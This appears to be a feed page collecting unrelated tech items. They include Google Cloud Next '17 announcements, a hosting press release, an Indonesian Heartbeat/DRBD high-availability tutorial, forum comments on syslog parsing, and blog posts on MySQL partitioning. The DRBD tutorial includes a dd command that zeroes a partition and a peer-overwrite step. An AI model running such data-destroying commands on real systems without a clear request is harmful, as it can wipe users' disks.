50. Hangouts Chat (EAP) - Hangouts Chat is an intelligent communication app in Hangouts with dedicated, virtual rooms that connect cross-functional enterprise teams. Hangouts Chat integrates with G Suite apps like Drive and Docs, as well as photos, videos and other third-party enterprise apps.

51. @meet - @meet is an intelligent bot built on top of the Hangouts platform that uses natural language processing and machine learning to automatically schedule meetings for your team with Hangouts Meet and Google Calendar.

52. Gmail Add-ons for G Suite (Developer Preview) - Gmail Add-ons provide a way to surface the functionality of your app or service directly in Gmail. With Add-ons, developers only build their integration once, and it runs natively in Gmail on web, Android and iOS.

53. Edit Opportunities in Google Sheets - with Edit Opportunities in Google Sheets, sales reps can sync a Salesforce Opportunity List View to Sheets to bulk edit data and changes are synced automatically to Salesforce, no upload required.

54. Jamboard - Our whiteboard in the cloud goes GA in May! Jamboard merges the worlds of physical and digital creativity. It’s real time collaboration on a brilliant scale, whether your team is together in the conference room or spread all over the world.


Building on the momentum from a growing number of businesses using Chrome digital signage and kiosks, we added new management tools and APIs in addition to introducing support for Android Kiosk apps on supported Chrome devices. 

55. Android Kiosk Apps for Chrome - Android Kiosk for Chrome lets users manage and deploy Chrome digital signage and kiosks for both web and Android apps. And with Public Session Kiosks, IT admins can now add a number of Chrome packaged apps alongside hosted apps.

56. Chrome Kiosk Management Free trial - This free trial gives customers an easy way to test out Chrome for signage and kiosk deployments.

57. Chrome Device Management (CDM) APIs for Kiosks - These APIs offer programmatic access to various Kiosk policies. IT admins can schedule a device reboot through the new APIs and integrate that functionality directly in a third- party console.

58. Chrome Stability API - This new API allows Kiosk app developers to improve the reliability of the application and the system.


Attendees at Google Cloud Next ‘17 heard stories from many of our valued customers:

59. Colgate - Colgate-Palmolive partnered with Google Cloud and SAP to bring thousands of employees together through G Suite collaboration and productivity tools. The company deployed G Suite to 28,000 employees in less than six months.

60. Disney Consumer Products & Interactive (DCPI) - DCPI is on target to migrate out of its legacy infrastructure this year, and is leveraging machine learning to power next generation guest experiences.

61. eBay - eBay uses Google Cloud technologies including Google Container Engine, Machine Learning and AI for its ShopBot, a personal shopping bot on Facebook Messenger.

62. HSBC - HSBC is one of the world's largest financial and banking institutions and making a large investment in transforming its global IT. The company is working closely with Google to deploy Cloud DataFlow, BigQuery and other data services to power critical proof of concept projects.

63. LUSH - LUSH migrated its global e-commerce site from AWS to GCP in less than six weeks, significantly improving the reliability and stability of its site. LUSH benefits from GCP’s ability to scale as transaction volume surges, which is critical for a retail business. In addition, Google's commitment to renewable energy sources aligns with LUSH's ethical principles.

64. Oden Technologies - Oden was part of Google Cloud’s startup program, and switched its entire platform to GCP from AWS. GCP offers Oden the ability to reliably scale while keeping costs low, perform under heavy loads and consistently delivers sophisticated features including machine learning and data analytics.

65. Planet - Planet migrated to GCP in February, looking to accelerate their workloads and leverage Google Cloud for several key advantages: price stability and predictability, custom instances, first-class Kubernetes support, and Machine Learning technology. Planet also announced the beta release of their Explorer platform.

66. Schlumberger - Schlumberger is making a critical investment in the cloud, turning to GCP to enable high-performance computing, remote visualization and development velocity. GCP is helping Schlumberger deliver innovative products and services to its customers by using HPC to scale data processing, workflow and advanced algorithms.

67. The Home Depot - The Home Depot collaborated with GCP’s Customer Reliability Engineering team to migrate HomeDepot.com to the cloud in time for Black Friday and Cyber Monday. Moving to GCP has allowed the company to better manage huge traffic spikes at peak shopping times throughout the year.

68. Verizon - Verizon is deploying G Suite to more than 150,000 of its employees, allowing for collaboration and flexibility in the workplace while maintaining security and compliance standards. Verizon and Google Cloud have been working together for more than a year to bring simple and secure productivity solutions to Verizon’s workforce.


We brought together Google Cloud partners from our growing ecosystem across G Suite, GCP, Maps, Devices and Education. Our partnering philosophy is driven by a set of principles that emphasize openness, innovation, fairness, transparency and shared success in the cloud market. Here are some of our partners who were out in force at the show:

69. Accenture - Accenture announced that it has designed a mobility solution for Rentokil, a global pest control company, built in collaboration with Google as part of the partnership announced at Horizon in September.

70. Alooma - Alooma announced the integration of the Alooma service with Google Cloud SQL and BigQuery.

71. Authorized Training Partner Program - To help companies scale their training offerings more quickly, and to enable Google to add other training partners to the ecosystem, we are introducing a new track within our partner program to support their unique offerings and needs.

72. Check Point - Check Point® Software Technologies announced Check Point vSEC for Google Cloud Platform, delivering advanced security integrated with GCP as well as their joining of the Google Cloud Technology Partner Program.

73. CloudEndure - We’re collaborating with CloudEndure to offer a no cost, self-service migration tool for Google Cloud Platform (GCP) customers.

74. Coursera - Coursera announced that it is collaborating with Google Cloud Platform to provide an extensive range of Google Cloud training course. To celebrate this announcement  Coursera is offering all NEXT attendees a 100% discount for the GCP fundamentals class.

75. DocuSign - DocuSign announced deeper integrations with Google Docs.

76. Egnyte - Egnyte announced an enhanced integration with Google Docs that will allow our joint customers to create, edit, and store Google Docs, Sheets and Slides files right from within the Egnyte Connect.

77. Google Cloud Global Partner Awards - We recognized 12 Google Cloud partners that demonstrated strong customer success and solution innovation over the past year: Accenture, Pivotal, LumApps, Slack, Looker, Palo Alto Networks, Virtru, SoftBank, DoIT, Snowdrop Solutions, CDW Corporation, and SYNNEX Corporation.

78. iCharts - iCharts announced additional support for several GCP databases, free pivot tables for current Google BigQuery users, and a new product dubbed “iCharts for SaaS.”

79. Intel - In addition to the progress with Skylake, Intel and Google Cloud launched several technology initiatives and market education efforts covering IoT, Kubernetes and TensorFlow, including optimizations, a developer program and tool kits.

80. Intuit - Intuit announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

81. Liftigniter - Liftigniter is a member of Google Cloud’s startup program and focused on machine learning personalization using predictive analytics to improve CTR on web and in-app.

82. Looker - Looker launched a suite of Looker Blocks, compatible with Google BigQuery Data Transfer Service, designed to give marketers the tools to enhance analysis of their critical data.

83. Low interest loans for partners - To help Premier Partners grow their teams, Google announced that capital investment are available to qualified partners in the form of low interest loans.

84. MicroStrategy - MicroStrategy announced an integration with Google Cloud SQL for PostgreSQL and Google Cloud SQL for MySQL.

85. New incentives to accelerate partner growth - We are increasing our investments in multiple existing and new incentive programs; including, low interest loans to help Premier Partners grow their teams, increasing co-funding to accelerate deals, and expanding our rebate programs.

86. Orbitera Test Drives for GCP Partners - Test Drives allow customers to try partners’ software and generate high quality leads that can be passed directly to the partners’ sales teams. Google is offering Premier Cloud Partners one year of free Test Drives on Orbitera.

87. Partner specializations - Partners demonstrating strong customer success and technical proficiency in certain solution areas will now qualify to apply for a specialization. We’re launching specializations in application development, data analytics, machine learning and infrastructure.

88. Pivotal - GCP announced Pivotal as our first CRE technology partner. CRE technology partners will work hand-in-hand with Google to thoroughly review their solutions and implement changes to address identified risks to reliability.

89. ProsperWorks - ProsperWorks announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

90. Qwiklabs - This recent acquisition will provide Authorized Training Partners the ability to offer hands-on labs and comprehensive courses developed by Google experts to our customers.

91. Rackspace - Rackspace announced a strategic relationship with Google Cloud to become its first managed services support partner for GCP, with plans to collaborate on a new managed services offering for GCP customers set to launch later this year.

92. Rocket.Chat - Rocket.Chat, a member of Google Cloud’s startup program, is adding a number of new product integrations with GCP including Autotranslate via Translate API, integration with Vision API to screen for inappropriate content, integration to NLP API to perform sentiment analysis on public channels, integration with GSuite for authentication and a full move of back-end storage to Google Cloud Storage.

93. Salesforce - Salesforce announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

94. SAP - This strategic partnership includes certification of SAP HANA on GCP, new G Suite integrations and future collaboration on building machine learning features into intelligent applications like conversational apps that guide users through complex workflows and transactions.

95. Smyte - Smyte participated in the Google Cloud startup program and protects millions of actions a day on websites and mobile applications. Smyte recently moved from self-hosted Kubernetes to Google Container Engine (GKE).

96. Veritas - Veritas expanded its partnership with Google Cloud to provide joint customers with 360 Data Management capabilities. The partnership will help reduce data storage costs, increase compliance and eDiscovery readiness and accelerate the customer’s journey to Google Cloud Platform.

97. VMware Airwatch - Airwatch provides enterprise mobility management solutions for Android and continues to drive the Google Device ecosystem to enterprise customers.

98. Windows Partner Program- We’re working with top systems integrators in the Windows community to help GCP customers take full advantage of Windows and .NET apps and services on our platform.

99. Xplenty - Xplenty announced the addition of two new services from Google Cloud into their available integrations: Google Cloud Spanner and Google Cloud SQL for PostgreSQL.

100. Zoomdata - Zoomdata announced support for Google’s Cloud Spanner and PostgreSQL on GCP, as well as enhancements to the existing Zoomdata Smart Connector for Google BigQuery. With these new capabilities Zoomdata offers deeply integrated and optimized support for Google Cloud Platform’s Cloud Spanner, PostgreSQL, Google BigQuery, and Cloud DataProc services.

We’re thrilled to have so many new products and partners that can help all of our customers grow. And as our final announcement for Google Cloud Next ’17 — please save the date for Next 2018: June 4–6 in San Francisco.

I guess that makes it 101. :-)

          Migrate a database from MySQL to IBM Informix Innovator-C Edition, Part 2: Step-by-step walk-through of the migration process        
Walk through a migration from MySQL to Informix, step by step. The tutorial provides a conversion methodology and discusses the processes for migrating both database objects and data. It includes a discussion of SQL differences and shows how to migrate tables, views, stored procedures, functions, triggers, and more.
          Inmotion Hosting - Inexpensive Cpanel Website Hosting Business        

InMotion is extremely assured of the services that customers can securely subscribe for their services using a 30-day cash back guarantee.

Nashville, TN -- (SBWIRE) -- 02/28/2014 -- The three pillars which have created InMotion among the most popular and best web hosting company are its cost, speed and stability. The Linux-Based web hosting support is supervised all through the day by skilled experts and they don't just examine the operation of the web server but additionally work to improve the performance of the host. The starting package of the website hosting comes at only $ 6.95 monthly and it's among the most widely used deals around at this moment.

Among the greatest benefits of InMotion hosting is their strong e-mail account. Whether for business or personal needs, InMotion customers can make unlimited email accounts. Users can access them easily from everywhere as these email accounts are kind of webmail accounts. Customers may also be in a position to manage their site through the accustomed CPanel. From E-Mail to document access, website managers will have over 30 features providing them with total control of the website.

Based on inmotion hosting review, it supports programs such as CGI, PHP, SSI, Python, Perl etc. There would even be Flash support and MySQL for the customers of the providers. Obviously, few multimedia helps could be supplied, such as for instance MIDI files, Real Audio and few streaming platforms having an IP address that will be dedicated. The reporting as well as the marketing tools and data supplied by InMotion isn't bad also because they might have some tools for proprietors to enhance the result of marketing with the usage of some well-known keywords to advertise the websites.

About bestwebhostingrates.com
Bestwebhostingrates is an online portal providing people with current and substantial evaluations on web hosting companies to simply help anyone to start a reliable website. This online portal collects firsthand data from real clients and perform a research of capabilities, features and upgrades from numerouis servers available online.

Contact Information:
For more information and other media related inquiries, please contact:
Contact Name :James Berke
Contact Phone: (320) 634-6781
Contact Email :james@bestwebhostingratings.com
Website: http://www.bestwebhostingrates.com/
Complete address :7051 Highway 70 South Suite 126
Zip Code: 37221

For more information on this press release visit: http://www.sbwire.com/press-releases/inmotion-hosting-inexpensive-cpanel-website-hosting-business-469196.htm

Media Relations Contact

Steve Kaplan
Telephone: 320-634-6781
Email: Click to Email Steve Kaplan
Web: http://www.bestwebhostingrates.com/

          Heartbeat dan DRBD        
Dalam sebuah implementasi saya harus mengganti implementasi vrrpd (virtual router redundancy protocol) dengan heartbeat+drbd disebabkan adanya penambahan database dalam server yang digunakan. Service awal pada mesin ini hanyalah web server statis, named dan dhcpd yang relatif statis dan file-filenya saya sinkronisasi dengan rsync. Tetapi dengan adanya penambahan database (mysql) dibutuhkan sebuah mekanisme dimana data yang disimpan dalam satu mesin primary dapat secara langsung ditulis juga ke mesin backup. Untuk hal yang terakhir ini vrrpd saja tidak mencukupi karenanya saya harus mengganti vrrpd dengan heartbeat (baca hartbit, bukan hertbet :-) )sedangkan untuk menjamin mekanisme clusternya saya menggunakan drbd.

Implementasi heartbeat saja sangatlah mudah. Cukup mendownload, mengkompilasi dan mengkonfigurasi tiga buah file /etc/ha.d/ha.cf, /etc/ha.d/authkeys dan /etc/ha.d/haresources. Untuk drbd bisa download tarball dan jangan lupa untuk membaca dokumentasinya, karena drbd harus dikompilasi dengan kernel source secara baik, kalau tidak anda dapat menemui kesulitan dalam mem-probe modul drbd. Pada server ini saya menggunakan openSUSE 11.1 sehingga hidup jadi lebih mudah, tinggal gunakan 1-click install untuk heartbeat, drbd kernel module dan drbd user space, atau bisa juga dengan mengaktifkan repositori http://download.opensuse.org/repositories/server:/ha-clustering/

Konfigurasi Heartbeat

Pastikan anda menggunakan dua buah server untuk high availability cluster. Kalau hanya punya satu ya tidak perlu heartbeat dan drbd :-). Untuk penggunaan lebih dari 2 buah server sebaiknya menggunakan pacemaker dan openAIS karena dapat melakukan N-to-N atau N+1 cluster sampai jumlah yang teorithically tidak terbatas. Tetapi saya tidak akan menjelaskan pacemaker dan openAIS di sini.
Pada setiap server menggunakan dua buah ethernet card, atau bisa juga 1 ethernet card dan koneksi langsung antar kedua server dengan menggunakan null-modem cable.
Satu buah ethernet terhubung ke jaringan dan satu buah lagi sebaiknya dihubungkan antar server langsung menggunakan cross cable (tidak harus tetapi disarankan)
Pastikan ethernet bekerja dengan baik.
Pada skenario di atas eth0 real ip diset secara permanen dengan ifup, sedangkan virtual ip akan diset melalui file /etc/ha.d/haresources. Silakan ganti ip address sesuai dengan yang anda gunakan.
Konfigur file /etc/ha.d/ha.cf, /etc/ha.d/haresources, /etc/ha.d/authkeys. File-file ini harus sama di kedua server.
Contoh file ha.cf

keepalive 2
warntime 5
deadtime 15
initdead 90
udpport 694
auto_failback on
bcast eth0
node server1 server2

bcast eth0, maksudnya adalah ethernet yang akan digunakan oleh client untuk mengakses server. node, diikuti dengan nama server primary dan server secondary sesuai dengan hasil "uname -n"

Contoh file authkeys

Jika kedua server terhubung dengan kabel null-modem atau kabel cross anda dapat mengabaikan enkripsi dan mengisi file authkeys dengan misalnya:

auth 2
2 crc

Tetapi jika anda menggunakan jaringan, misalnya letak kedua server terpisah secara geografis maka penggunaan enkripsi sangat dianjurkan dengan format

auth num
num algorithm secret

Untuk membuatnya dapat gunakan script dibawah

# ( echo -ne "auth 1 1 sha1 "; dd if=/dev/urandom bs=512 count=1 | openssl md5 )  > /etc/ha.d/authkeys

Selanjutnya jangan lupa set agar authkeys hanya bisa dibaca dan ditulis oleh root # chmod 0600 /etc/ha.d/authkeys

Contoh file /etc/ha.d/haresources

Konfigurasi haresources tanpa drbd / sebelum drbd diaktifkan misalnya

    server1 IPaddr:: named dhcpd apache2
Arti dari baris tersebut adalah:

server1 --> nama server primary sesuai "uname -n"
IPaddr:: --> ipaddress virtual yang digunakan di eth0
named dhcpd apache2 --> nama services yang redundan
Anda dapat menset service heartbeat agar jalan di run level saat booting, misalnya dengan perintah "chkconfig heartbeat on" atau pada openSUSE dengan "insserv /etc/init.d/heartbeat". Saya sendiri di openSUSE lebih menyukai untuk menjalankannya melalui file /etc/init.d/after.local misalnya vim /etc/init.d/after.local:

#! /bin/sh
sleep 2
rcheartbeat start

Jangan lupa untuk mengcopy semua file konfigurasi yang anda buat di server1 ke server2 (gunakan scp or whatever) ha.cf, haresources, authkeys dan after.local (kalau anda pakai). Heartbeat sebenarnya menyediakan fasilitas mencopy konfigurasi dari node primary ke node cluster lainnya dengan ha_propagate. Coba cari filenya di /usr/share/heartbeat/ha_propagate atau di /usr/lib/heartbeat/ha_propagate. Saya sendiri lebih prefer menggunakan scp :-)

Dari server1 coba "ifconfig" maka kalau semuanya ok akan muncul eth0:0 dengan ip Dari client coba ping dan ssh ip tersebut, kalau masuk ke maka heartbeat sudah bekerja sempurna. Selanjutnya matikan service heartbeat di server1, cek dengan ifconfig bahwa eth0:0 sudah tidak ada. Masuk ke server2 dan cek dengan ifconfig, harusnya sekarang eth0:0 dengan ip sudah diambil alih oleh server2. Untuk mengembalikan ke server1 maka aktifkan service heartbeat di server1. Kalau ini semua ok berarti service heartbeat sudah berjalan dengan sempurna. Anda dapat juga mentest dengan mematikan eth0 pada server1, dan yakinkan bahwa ip virtual eth0:0 juga diambil alih oleh server2.

Konfigurasi drbd

Drbd merupakan singkatan dari Distributed Replicated Block Device. Drbd akan me-mirror seluruh block device yang telah didefinisikan dan bekerja sebaga raid-1 over network. Konfigurasi drbd cukup mudah walaupun tidak semudah heartbeat :-P Anda butuh kesabaran. Beberapa hal yang perlu diperhatikan. User space dan kernel space harus dengan versi yang sama. Ada kejadian dimana seseorang mendownload tarball dan kemudian mengupdate instalasi drbd. Waktu menjalankan configure dia tidak mendefinisikan kernel directory, akibatnya user space drbd (misalnya drbdadm) meningkat versinya tetapi modul drbd.ko tidak terupdate. Akibatnya mesin bisa hang :-( Setidaknya dalam mengkonfigure jalankan ./configure --prefix=/usr --localstatedir=/var --sysconfdir=/etc --with-km

Selanjutnya jalankan:

# cd drbd
# make clean
# make KDIR=/path/to/kernel/source
Untuk pengguna openSUSE tidak perlu melakukan langkah-langkah ini cukup install menggunakan 1-click install seperti yang sudah saya sebutkan di awal tulisan.

Hal lain yang sering salah dilakukan waktu mengkonfigurasi drbd adalah membuat filesystem saat merepartisi disk untuk drbd device. Hal ini harus dihindari sampai modul drbd kita panggil untuk pertama kali. Berikut adalah langkah-langkahnya:

siapkan pastisi untuk /dev/drbd yang akan digunakan untuk saling bereplikasi dan biarkan partisi tanpa filesystem. Ukuran partisi akan menentukan berapa lama keduanya bersinkronisasi, makin besar ukuran partisi maka makin lama sinkronisasi mencapai kondisi Consistent. Selain itu bisa juga disiapkan satu partisi tambahan untuk metadata walaupun tidak mandatory. Ukuran partisi di kedua server haruslah sama.

Edit file /etc/drbd.conf menjadi:

# You can find an example in  /usr/share/doc/drbd.../drbd.conf.example

#include "drbd.d/global_common.conf";
#include "drbd.d/*.res";

usage-count yes;
 protocol C;
resource r0{
  after-sb-0pri discard-younger-primary;
  after-sb-1pri discard-secondary;
  after-sb-2pri disconnect;
on server1{
 device /dev/drbd0;
 disk /dev/cciss/c0d0p6;
 meta-disk internal;
on server2{
 device /dev/drbd0;
 disk /dev/cciss/c0d0p6;
 meta-disk internal;
Pada server1 & server2 jalankan perintah:

# modprobe drbd
# drbdadm up all
# cat /proc/drbd
akan muincul tampilan dikedua server seperti:

server1:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
    ns:45542488 nr:0 dw:0 dr:45542488 al:0 bm:2779 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

server2:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
    ns:45542488 nr:0 dw:0 dr:45542488 al:0 bm:2779 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

Selanjutnya buatlah metadata untuk drbd di setiap server

server1:~ # drbdadm create-md r0
server1:~ # rcdrbd start
server2:~ # drbdadm create-md r0
server2:~ # rcdrbd start
Kita akan menjadikan server1 sebagai primary node, karena iotu pada server1 jalankan:

server1:~ # drbdadm  primary all
server1:~ # drbdadm connect all
Jika ada masalah, kemungkinan besar adalah karena sudah ada file system. Untuk menghapus file sistem tanpa mengubah partisi dapat menjalankan perintah

dd if=/dev/zero bs=512 count=512 of=/dev/your_partition

Bisa juga ditemukan atau adanya kesalahan saat menginisiasi drbd yang berakibat kedua disk sudah berada dalam kondisi Primary/Secondary Inconsistent/Inconsistent. Pada saat awal harusnya semua dalam kondisi Secondary/Secondary. Jika menemui masalah ini jalankan:

server1:~ # drbdadm -- --overwrite-data-of-peer primary all

Selanjutnya jalankan pada server 1

          server1:~# drbdsetup /dev/drbd0 primary --overwrite-data-of-peer

Sekarang inisial sinkronisasi akan mulai berjalan.

server1:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:SyncSource st:Primary/Secondary ds:UpToDate/Inconsistent C r---
    ns:36350976 nr:0 dw:0 dr:36351244 al:0 bm:2218 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:68502008
        [=====>..............] sync'ed: 34.7% (66896/102392)M
        finish: 53:31:01 speed: 348 (320) K/sec

Prosesnya cukup memakan waktu dan bergantung dari ukuran disk yang digunakan sebagai device drbd. Bersabarlah dan menunggu sampai prosesnya selesai. Saya selalu menunggu sinkronisasi sampai selesai 100% untuk yang pertama kali sebelum melakukan apapun (walaupun tidak harus). Jika sudah selesai maka hasilnya akan seperti:

server1:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:UpToDate/UpToDate C r---
    ns:45542488 nr:0 dw:0 dr:45542488 al:0 bm:2779 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

server2:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:UpToDate/UpToDate C r---
    ns:0 nr:44887544 dw:44887544 dr:0 al:0 bm:2740 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0 

Selanjutnya pada server1 kita akan membuat file system. Cukup dilakukan di server1, karena server2 akan mengikuti:

server1:~ # drbdadm primary all
server1:~ # mkfs.ext3 /dev/drbd0
sekarang kita siapkan directory untuk mysql di server1

mkdir /data-mysql

mount -t ext3 /dev/drbd0 /data-mysql

mv /var/lib/mysql /data-mysql

ln -s /data-mysql/mysql /var/lib/mysql

umount /data-mysql

di server2:

 mv /var/lib/mysql /tmp

 ln -s /data-mysql/mysql /var/lib/mysql

Edit file /etc/ha.d/haresources di server1 dan server2 menjadi

server1 IPaddr:: drbddisk::r0 Filesystem::/dev/drbd0::/data-mysql::ext3 named dhcpd apache2 mysql

Selanjutnya tinggal memanggil drbd dan heartbeat di runlevel 3 dan 5 setiap kali server di boot. Saya sendiri di openSUSE mmenggunakan /etc/init.d/after.local untuk memanggil drbd dan heartbeat. Ini hanya untuk memastikan bahwa drbd dan heartbeat dipanggil terakhir kali setelah semua service yang lain berjalan. Cukup buat file /etc/init.d/after.local dan isikan misalnya:


sleep 1
rcdrbd start
sleep 2
rcheartbeat start

Sekarang kita tinggal mengujinya. Apakah service-service yang didefinisikan di /etc/ha.d/haresources akan berpindah ke server2 jika server1 dimatikan. Tahu kan cara menguinya? Kira-kira sama dengan cara menguji heartbeat di atas.

Have a lot of fun  
          Hal yang perlu diperhatikan saat Setting Konfigurasi        
Hal yang perlu diperhatikan saat Setting Konfigurasi – MySQL adala perangkat lunak sistem manajemen basis data SQL  database management system) atau DBMS yang multithread, multi-user. MySQL AB membuat MySQL tersedia sebagai perangkat lunak gratis dibawah lisensi GNU General Public License (GPL), tetapi mereka ...
          30.08.2012 08:19:35 Deks        
У меня так же работает SYSlog сервер который собирает себе в MySQLную базу все логи с Windows-серверов. Заметил только, что неокторые логи приходят обрезаные:( Поле Message, если оно достаточно большое, обрезается, видимо. Проверил прямым запросом к базе, и там они так же обрезаны. Так же заметил, что некоторые логи вообще пустые в поле Message. Возможно проблема конечно с клиентом который кидает все это на сислог-сервер. У меня Evtsys используется.
Кстати вопрос как раз таки… кто нибудь вкурсе как кидать алерты с rsyslog-сервера в Jabber? :)
          30.08.2012 08:10:32 JukeBox        
Я у нас делал так: С помощью Snare конвертировал Eventlog в Syslog и отправлял его на соседний Linux — сервер, который скриптом на перле обрабатывал каждую строку и делал выводы по этим шаблонам:

if($_[0]=~m/READ_CONTROL ReadData \(or ListDirectory\) ReadEA ReadAttributes/i){return OPEN;}
elsif($_[0]=~m/READ_CONTROL ReadData \(or ListDirectory\) WriteData \(or AddFile\) AppendData \(or AddSubdirectory or CreatePipeInstance\) ReadEA WriteEA ReadAttributes WriteAttributes/i){return EDIT;}
elsif($_[0]=~m/DELETE ReadAttributes/i){return DELETE;}
elsif($_[0]=~m/READ_CONTROL WRITE_DAC ReadData \(or ListDirectory\) WriteData \(or AddFile\) AppendData \(or AddSubdirectory or CreatePipeInstance\) ReadEA WriteEA ReadAttributes WriteAttributes/i){return PASTE;}
elsif($_[0]=~m/DELETE SYNCHRONIZE/i){return MOVE;}
elsif($_[0]=~m/DELETE READ_CONTROL ReadData \(or ListDirectory\) WriteData \(or AddFile\) AppendData \(or AddSubdirectory or CreatePipeInstance\) WriteEA ReadAttributes WriteAttributes/i){return MOVE;}

Потом это все писалось в Mysql и отчеты делались уже по ней, не нагружая сервер с виндой.
Но, конечно, у вас проверки более детальные, у меня определял иногда действия ошибочно и генерировал очень много лишних логов. Надо переписать согласно вашей статье, спасибо!

          OracleToMysql 2.3        
OracleToMysql - Import Oracle to MySQL easy and quickly.
          ORA-01017: invalid username/password; logon denied        
I’ve been testing unixODBC with MySQL and PostgresSQL and recently tried using it with Oracle 11g. After getting everything setup I kept getting the following error 28000:1:1017:[unixODBC][Oracle][ODBC][Ora]ORA-01017: invalid username/password; logon denied I finally discovered that this is because Oracle uses “UserID” instead of “User” in the ODBC configuration of the DSN.
          Partitioning perils, and loading Really Big MySQL tables        
We discovered an interesting problem in our environment. Our schema and partitioning rules were originally designed for the single-customer version of our product. When we went to a multi-customer hosted SaaS product, the simplest approach was to change our ID generator to bake the customer ID into the lower bytes of all our IDs, and use the high bytes for the sequence part of the ID. This works well, and allowed our code and schema to go to a multi-customer environment easily.

But one interesting point that we missed was we partitioned some of our biggest tables using simple hashes on ID. This gave a nice, even distribution of data in partitions before we did the "cooked" version of our IDs, but since MySQL uses a simple "mod(value, n_partitions)" as the hash function for hashed partitions, and we also used "mod(id, customer_multiplier)" to grab the "customer ID" out of a general ID (and customer_multiplier is greater than n_partitions), we ended up effectively partitioning these tables by customer ID.

This wouldn't be so bad except our customers vary drastically in size, so this is a poor partition choice (and is why we didn't choose to explicitly use customer ID as a partition rule, even though it was discussed).


We get to rebuild some huge tables in our archive, using a new partition rule that strips off the customer ID portion of the ID before doing the partition hash. I've been doing experiments, and we'll go with a copy, catchup, and replace strategy. The "copy" bit can be done with the db and apps live, and takes a couple of days to do. The catchup bit needs to happen with the apps offline, but is fairly fast. Once this is done, we can rename the copy table over the existing table, and we've effectively done the "alter table" operation.

As for building the copy table, I found I got the fastest loads when doing a Create Table as Select with the Select part ordered by the partition rule itself:

create table copytab (cols)
engine=innodb, partition using hash(id div cust_multiplier) partitions 1024
as select cols
from source_tab order by mod(id div cust_multiplier, 1024), id;

This "order by" groups all the rows by partition, which results in each partition being built completely before the next partition is built, and the secondary ordering by ID causes each partition B-tree to be inserted in sort order. As for MySQL configuration parameters, I temporarily set sort_buffer_size to 8GB and lowered the buffer pool size a bit.
          The case for a new open-source relational database        
I've been thinking about a new open-source relational database for a while, and here's my thoughts as to why the world needs one, even though PostgreSQL and MySQL would seem to have a lock, with SQLite doing well in small devices.

First, some strengths and weaknesses of each:

1. PostgreSQL is very good at query optimization, and has a large and powerful set of query answering facilities. Where it isn't so wonderful is its storage engine, where the old "versioned" storage manager, complete with its vacuum cleaner - which sucked in 1990 when I worked on it and is still a operational PITA - still resides. It "works", and is serviceable for many applications (particularly large archival apps, where deletes and updates are done rarely or never), but is a huge problem for always-up OLTP apps.

2. OTOH, MySQL has the opposite problem: its parser and executor are lame (gee, will they ever figure out how to cache constant subquery results? How about hashjoins? Type checking? Not defaulting to friggin case-insensitive Swedish as the default collation?), but its open storage architecture allows lots of interesting storage engines, and InnoDB's index-organized structure kicks butt if you know how to use it. We use MySQL/InnoDB for a very large, SaaS database ourselves with both heavy OLTP components and heavy archival search components. To get around its sucky top-level, I have to carefully police all significant queries, make extensive use of optimizer hints, and work with developers to make certain they aren't doing something problematic like using a subquery that is always treated as correlated, etc.

In a dream-world, I could figure out a way to hook up PostgreSQL's top level with the InnoDB storage engine. That would be a powerful relational engine.

That said, there are things neither engine, and no relational db engine in the open-source world that I'm aware of, do very well:

1. Better handling of in-memory tables and in-memory indexes. One thing I did that was very popular in DeviceSQL was an efficient in-memory hashed and ordered index on a persistent table. It is very popular with customers and was extremely fast.
2. Fast bootup, even after ungraceful shutdown. Given that Serious Databases increasingly exist on small, portable devices, fast bootup is needed. Fast bootup has all sorts of implications for transaction handling, so it has to be "designed in" from the beginning.
3. An open storage architecture is a must, both for base storage and for indexes (and the open-storage architecture should allow index-organized base storage as well).
4. "Vector" index query answering facilities. One of the biggest limitations on relational database execution engines today is the inability to use multiple indexes on the same table. A "vector index strategy" would allow large tables to be searched by multiple parameters without needing to "pick a winner" (and often there isn't any good choices to pick...)

More later...
          MySQL, Postgres, and InnoDB: Some Critiques of Index Organized Tables        
This discussion of InnoDB versus Postgres' storage engine (and index organized table structures generally, as this could also apply to Oracle's IOT's) is worth a careful read. Since our schema makes heavy use of the index organized property of InnoDB - and since I have a bit of a fanboy wish to use Postgres as I worked on it for a few years versus helping to buy Larry another yacht - here's some discussion of where index organized structures add value and some criticisms of my own.

Even though one used a primary key definition to define the "index organization structure", in my opinion, the real power of index organized table structures is in larger, "bulk" searches over single-record lookups of the sort one would typically do with a primary key. Assuming very careful schema design and querying, the advantage with "bulk" searches is that a single B-tree ingress is all that is necessary to answer the search, while secondary indexes require at least some indirection into the table, which gets expensive if the working set involves millions of records (as it often does, at least in our case). See the below discussion on telemetry schemas for more.

Index Organized Table Wishlist

  1. Have an explicit "ORGANIZATION KEY" table declaration (or some such) and not rely on the PRIMARY KEY. If the organization key doesn't completely define the storage, allow "..." or something to allow for an incompletely defined organization key. If "ORGANIZATION KEY" is omitted, default to the PRIMARY KEY.
